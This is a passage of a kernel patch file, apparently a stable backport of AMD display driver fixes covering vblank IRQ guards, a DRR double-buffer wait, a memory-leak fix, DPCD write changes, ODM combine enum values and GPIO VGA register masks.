+@@ -77,6 +77,9 @@ int dm_set_vupdate_irq(struct drm_crtc *crtc, bool enable)
+ 	struct amdgpu_device *adev = drm_to_adev(crtc->dev);
+ 	int rc;
+ 
++	if (acrtc->otg_inst == -1)
++		return 0;
++
+ 	irq_source = IRQ_TYPE_VUPDATE + acrtc->otg_inst;
+ 
+ 	rc = dc_interrupt_set(adev->dm.dc, irq_source, enable) ? 0 : -EBUSY;
+@@ -149,6 +152,9 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	struct vblank_control_work *work;
+ 	int rc = 0;
+ 
++	if (acrtc->otg_inst == -1)
++		goto skip;
++
+ 	if (enable) {
+ 		/* vblank irq on -> Only need vupdate irq in vrr mode */
+ 		if (amdgpu_dm_vrr_active(acrtc_state))
+@@ -166,6 +172,7 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
+ 		return -EBUSY;
+ 
++skip:
+ 	if (amdgpu_in_reset(adev))
+ 		return 0;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+index 2db595672a469..aa264c600408d 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+@@ -146,6 +146,9 @@ static int dcn314_smu_send_msg_with_param(struct clk_mgr_internal *clk_mgr,
+ 		if (msg_id == VBIOSSMC_MSG_TransferTableDram2Smu &&
+ 		    param == TABLE_WATERMARKS)
+ 			DC_LOG_WARNING("Watermarks table not configured properly by SMU");
++		else if (msg_id == VBIOSSMC_MSG_SetHardMinDcfclkByFreq ||
++			 msg_id == VBIOSSMC_MSG_SetMinDeepSleepDcfclk)
++			DC_LOG_WARNING("DCFCLK_DPM is not enabled by BIOS");
+ 		else
+ 			ASSERT(0);
+ 		REG_WRITE(MP1_SMN_C2PMSG_91, VBIOSSMC_Result_OK);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 5260ad6de8038..af7aefe285ffd 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -878,6 +878,7 @@ static bool dc_construct_ctx(struct dc *dc,
+ 
+ 	dc_ctx->perf_trace = dc_perf_trace_create();
+ 	if (!dc_ctx->perf_trace) {
++		kfree(dc_ctx);
+ 		ASSERT_CRITICAL(false);
+ 		return false;
+ 	}
+@@ -3221,6 +3222,21 @@ static void commit_planes_for_stream(struct dc *dc,
+ 
+ 	dc_z10_restore(dc);
+ 
++	if (update_type == UPDATE_TYPE_FULL) {
++		/* wait for all double-buffer activity to clear on all pipes */
++		int pipe_idx;
++
++		for (pipe_idx = 0; pipe_idx < dc->res_pool->pipe_count; pipe_idx++) {
++			struct pipe_ctx *pipe_ctx = &context->res_ctx.pipe_ctx[pipe_idx];
++
++			if (!pipe_ctx->stream)
++				continue;
++
++			if (pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear)
++				pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear(pipe_ctx->stream_res.tg);
++		}
++	}
++
+ 	if (get_seamless_boot_stream_count(context) > 0 && surface_count > 0) {
+ 		/* Optimize seamless boot flag keeps clocks and watermarks high until
+ 		 * first flip. After first flip, optimization is required to lower
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index 40b9d2ce08e66..328c5e33cc66b 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1916,12 +1916,6 @@ struct dc_link *link_create(const struct link_init_data *init_params)
+ 	if (false == dc_link_construct(link, init_params))
+ 		goto construct_fail;
+ 
+-	/*
+-	 * Must use preferred_link_setting, not reported_link_cap or verified_link_cap,
+-	 * since struct preferred_link_setting won't be reset after S3.
+-	 */
+-	link->preferred_link_setting.dpcd_source_device_specific_field_support = true;
+-
+ 	return link;
+ 
+ construct_fail:
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+index 1254d38f1778a..24f1aba4ae133 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+@@ -6591,18 +6591,10 @@ void dpcd_set_source_specific_data(struct dc_link *link)
+ 
+ 			uint8_t hblank_size = (uint8_t)link->dc->caps.min_horizontal_blanking_period;
+ 
+-			if (link->preferred_link_setting.dpcd_source_device_specific_field_support) {
+-				result_write_min_hblank = core_link_write_dpcd(link,
+-					DP_SOURCE_MINIMUM_HBLANK_SUPPORTED, (uint8_t *)(&hblank_size),
+-					sizeof(hblank_size));
+-
+-				if (result_write_min_hblank == DC_ERROR_UNEXPECTED)
+-					link->preferred_link_setting.dpcd_source_device_specific_field_support = false;
+-			} else {
+-				DC_LOG_DC("Sink device does not support 00340h DPCD write. Skipping on purpose.\n");
+-			}
++			result_write_min_hblank = core_link_write_dpcd(link,
++				DP_SOURCE_MINIMUM_HBLANK_SUPPORTED, (uint8_t *)(&hblank_size),
++				sizeof(hblank_size));
+ 		}
+-
+ 		DC_TRACE_LEVEL_MESSAGE(DAL_TRACE_LEVEL_INFORMATION,
+ 							WPP_BIT_FLAG_DC_DETECTION_DP_CAPS,
+ 							"result=%u link_index=%u enum dce_version=%d DPCD=0x%04X min_hblank=%u branch_dev_id=0x%x branch_dev_name='%c%c%c%c%c%c'",
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_dp_types.h b/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
+index 2c54b6e0498bf..296793d8b2bf2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
+@@ -149,7 +149,6 @@ struct dc_link_settings {
+ 	enum dc_link_spread link_spread;
+ 	bool use_link_rate_set;
+ 	uint8_t link_rate_set;
+-	bool dpcd_source_device_specific_field_support;
+ };
+ 
+ union dc_dp_ffe_preset {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
+index 88ac5f6f4c96c..0b37bb0e184b2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
+@@ -519,7 +519,8 @@ struct dcn_optc_registers {
+ 	type OTG_CRC_DATA_STREAM_COMBINE_MODE;\
+ 	type OTG_CRC_DATA_STREAM_SPLIT_MODE;\
+ 	type OTG_CRC_DATA_FORMAT;\
+-	type OTG_V_TOTAL_LAST_USED_BY_DRR;
++	type OTG_V_TOTAL_LAST_USED_BY_DRR;\
++	type OTG_DRR_TIMING_DBUF_UPDATE_PENDING;
+ 
+ #define TG_REG_FIELD_LIST_DCN3_2(type) \
+ 	type OTG_H_TIMING_DIV_MODE_MANUAL;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+index 892d3c4d01a1e..25749f7d88366 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+@@ -282,6 +282,14 @@ static void optc3_set_timing_double_buffer(struct timing_generator *optc, bool e
+ 		   OTG_DRR_TIMING_DBUF_UPDATE_MODE, mode);
+ }
+ 
++void optc3_wait_drr_doublebuffer_pending_clear(struct timing_generator *optc)
++{
++	struct optc *optc1 = DCN10TG_FROM_TG(optc);
++
++	REG_WAIT(OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, 0, 2, 100000); /* 1 vupdate at 5hz */
++
++}
++
+ void optc3_set_vtotal_min_max(struct timing_generator *optc, int vtotal_min, int vtotal_max)
+ {
+ 	optc1_set_vtotal_min_max(optc, vtotal_min, vtotal_max);
+@@ -351,6 +359,7 @@ static struct timing_generator_funcs dcn30_tg_funcs = {
+ 		.program_manual_trigger = optc2_program_manual_trigger,
+ 		.setup_manual_trigger = optc2_setup_manual_trigger,
+ 		.get_hw_timing = optc1_get_hw_timing,
++		.wait_drr_doublebuffer_pending_clear = optc3_wait_drr_doublebuffer_pending_clear,
+ };
+ 
+ void dcn30_timing_generator_init(struct optc *optc1)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
+index dd45a5499b078..fb06dc9a48937 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
+@@ -279,6 +279,7 @@
+ 	SF(OTG0_OTG_DRR_TRIGGER_WINDOW, OTG_DRR_TRIGGER_WINDOW_END_X, mask_sh),\
+ 	SF(OTG0_OTG_DRR_V_TOTAL_CHANGE, OTG_DRR_V_TOTAL_CHANGE_LIMIT, mask_sh),\
+ 	SF(OTG0_OTG_H_TIMING_CNTL, OTG_H_TIMING_DIV_BY2, mask_sh),\
++	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_MODE, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_BLANK_DATA_DOUBLE_BUFFER_EN, mask_sh)
+ 
+@@ -317,6 +318,7 @@
+ 	SF(OTG0_OTG_DRR_TRIGGER_WINDOW, OTG_DRR_TRIGGER_WINDOW_END_X, mask_sh),\
+ 	SF(OTG0_OTG_DRR_V_TOTAL_CHANGE, OTG_DRR_V_TOTAL_CHANGE_LIMIT, mask_sh),\
+ 	SF(OTG0_OTG_H_TIMING_CNTL, OTG_H_TIMING_DIV_MODE, mask_sh),\
++	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_MODE, mask_sh)
+ 
+ void dcn30_timing_generator_init(struct optc *optc1);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
+index 38842f938bed0..0926db0183383 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
+@@ -278,10 +278,10 @@ static void enc314_stream_encoder_dp_blank(
+ 	struct dc_link *link,
+ 	struct stream_encoder *enc)
+ {
+-	/* New to DCN314 - disable the FIFO before VID stream disable. */
+-	enc314_disable_fifo(enc);
+-
+ 	enc1_stream_encoder_dp_blank(link, enc);
++
++	/* Disable FIFO after the DP vid stream is disabled to avoid corruption. */
++	enc314_disable_fifo(enc);
+ }
+ 
+ static void enc314_stream_encoder_dp_unblank(
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index c80c8c8f51e97..9918bccd6defb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -888,6 +888,8 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 	.force_abm_enable = false,
+ 	.timing_trace = false,
+ 	.clock_trace = true,
++	.disable_dpp_power_gate = true,
++	.disable_hubp_power_gate = true,
+ 	.disable_pplib_clock_request = false,
+ 	.pipe_split_policy = MPC_SPLIT_DYNAMIC,
+ 	.force_single_disp_pipe_split = false,
+@@ -897,7 +899,7 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 	.max_downscale_src_width = 4096,/*upto true 4k*/
+ 	.disable_pplib_wm_range = false,
+ 	.scl_reset_length10 = true,
+-	.sanity_checks = false,
++	.sanity_checks = true,
+ 	.underflow_assert_delay_us = 0xFFFFFFFF,
+ 	.dwb_fi_phase = -1, // -1 = disable,
+ 	.dmub_command_table = true,
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
+index d3b5b6fedf042..6266b0788387e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
+@@ -3897,14 +3897,14 @@ void dml20_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > mode_lib->vba.MaxDispclkRoundedDownToDFSGranularity) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN20_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -3957,7 +3957,7 @@ void dml20_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
+index edd098c7eb927..989d83ee38421 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
+@@ -4008,17 +4008,17 @@ void dml20v2_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > MaxMaxDispclkRoundedDown) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->DSCEnabled[k] && (locals->HActive[k] > DCN20_MAX_DSC_IMAGE_WIDTH)) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN20_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -4071,7 +4071,7 @@ void dml20v2_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+index 1d84ae50311d9..b7c2844d0cbee 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+@@ -4102,17 +4102,17 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > MaxMaxDispclkRoundedDown) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->DSCEnabled[k] && (locals->HActive[k] > DCN21_MAX_DSC_IMAGE_WIDTH)) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN21_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -4165,7 +4165,7 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+@@ -5230,7 +5230,7 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 			mode_lib->vba.ODMCombineEnabled[k] =
+ 					locals->ODMCombineEnablePerState[mode_lib->vba.VoltageLevel][k];
+ 		} else {
+-			mode_lib->vba.ODMCombineEnabled[k] = false;
++			mode_lib->vba.ODMCombineEnabled[k] = dm_odm_combine_mode_disabled;
+ 		}
+ 		mode_lib->vba.DSCEnabled[k] =
+ 				locals->RequiresDSC[mode_lib->vba.VoltageLevel][k];
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index d90216d2fe3a8..04cc96e700981 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -1963,6 +1963,10 @@ void dcn32_calculate_wm_and_dlg_fpu(struct dc *dc, struct dc_state *context,
+ 		 */
+ 		context->bw_ctx.bw.dcn.watermarks.a = context->bw_ctx.bw.dcn.watermarks.c;
+ 		context->bw_ctx.bw.dcn.watermarks.a.cstate_pstate.pstate_change_ns = 0;
++		/* Calculate FCLK p-state change watermark based on FCLK pstate change latency in case
++		 * UCLK p-state is not supported, to avoid underflow in case FCLK pstate is supported
++		 */
++		context->bw_ctx.bw.dcn.watermarks.a.cstate_pstate.fclk_pstate_change_ns = get_fclk_watermark(&context->bw_ctx.dml, pipes, pipe_cnt) * 1000;
+ 	} else {
+ 		/* Set A:
+ 		 * All clocks min.
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index f4b176599be7a..0ea406145c1d7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -136,7 +136,7 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
+-	.pct_ideal_sdp_bw_after_urgent = 100.0,
++	.pct_ideal_sdp_bw_after_urgent = 90.0,
+ 	.pct_ideal_fabric_bw_after_urgent = 67.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_only = 20.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_and_vm = 60.0, // N/A, for now keep as is until DML implemented
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
+index 9b63c6c0cc844..e0bd0c722e006 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
+@@ -138,7 +138,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -147,7 +148,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
+index 687d4f128480e..36a5736c58c92 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
+@@ -145,7 +145,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -154,7 +155,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
+index 0ea52ba5ac827..9f6872ae40203 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
+@@ -149,7 +149,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -158,7 +159,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h b/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
+index 308a543178a56..59884ef651b39 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
++++ b/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
+@@ -113,6 +113,13 @@
+ 	(PHY_AUX_CNTL__AUX## cd ##_PAD_RXSEL## mask_sh),\
+ 	(DC_GPIO_AUX_CTRL_5__DDC_PAD## cd ##_I2CMODE## mask_sh)}
+ 
++#define DDC_MASK_SH_LIST_DCN2_VGA(mask_sh) \
++	{DDC_MASK_SH_LIST_COMMON(mask_sh),\
++	0,\
++	0,\
++	0,\
++	0}
++
+ struct ddc_registers {
+ 	struct gpio_registers gpio;
+ 	uint32_t ddc_setup;
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+index 25a1df45b2641..f96fb425345e4 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+@@ -325,6 +325,7 @@ struct timing_generator_funcs {
+ 			uint32_t vtotal_change_limit);
+ 
+ 	void (*init_odm)(struct timing_generator *tg);
++	void (*wait_drr_doublebuffer_pending_clear)(struct timing_generator *tg);
+ };
+ 
+ #endif
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611.c b/drivers/gpu/drm/bridge/lontium-lt9611.c
+index 7c0a99173b39f..3b77238ca4aff 100644
